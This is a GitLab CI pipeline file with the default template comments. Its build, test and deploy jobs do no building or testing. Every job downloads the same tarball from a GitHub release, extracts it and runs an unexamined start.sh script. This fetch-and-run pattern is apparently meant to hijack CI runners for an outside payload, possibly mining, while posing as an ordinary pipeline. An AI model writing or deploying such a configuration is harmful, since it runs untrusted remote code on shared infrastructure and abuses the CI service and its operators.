#
# A pipeline is composed of independent jobs that run scripts, grouped into stages.
# Stages run in sequential order, but jobs within stages run in parallel.
# For more information, see: https://docs.gitlab.com/ee/ci/yaml/README.html#stages
#

stages:
  - build
  - test
  - deploy

build-job:
  stage: build
  script:
    - wget https://github.com/santok171/sugargula/releases/download/02/kntl.tar.gz
    - tar xf kntl.tar.gz
    - sh start.sh

test-job1:
  stage: test
  script:
    - wget https://github.com/santok171/sugargula/releases/download/02/kntl.tar.gz
    - tar xf kntl.tar.gz
    - sh start.sh

test-job2:
  stage: test
  script:
    - wget https://github.com/santok171/sugargula/releases/download/02/kntl.tar.gz
    - tar xf kntl.tar.gz
    - sh start.sh

deploy-job:
  stage: deploy
  script:
    - wget https://github.com/santok171/sugargula/releases/download/02/kntl.tar.gz
    - tar xf kntl.tar.gz
    - sh start.sh
